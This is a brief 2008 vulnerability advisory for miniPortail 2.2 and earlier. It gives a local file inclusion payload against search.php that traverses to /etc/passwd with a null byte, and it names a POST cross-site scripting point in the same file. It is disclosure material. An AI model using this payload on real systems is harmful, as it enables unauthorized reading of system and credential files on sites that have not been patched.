miniPortail <= 2.2 (XSS-LFI) Remote Vulnerabilities

2008-10-23 22:01:04

/*

miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities
-------------------------------------------------------
By StAkeR - StAkeR[at]hotmail[dot]it
http://www.easy-script.com/scripts-dl/miniportail.zip
-------------------------------------------------------

-1 Local File Inclusion
- search.php?lng=../../../../../../etc/passwd%00

-2 Cross Site Scritping (POST)
- search.php (<script>[javascript]</script>)

*/

#

Fixes

No fixes

In order to submit a new fix you need to be registered.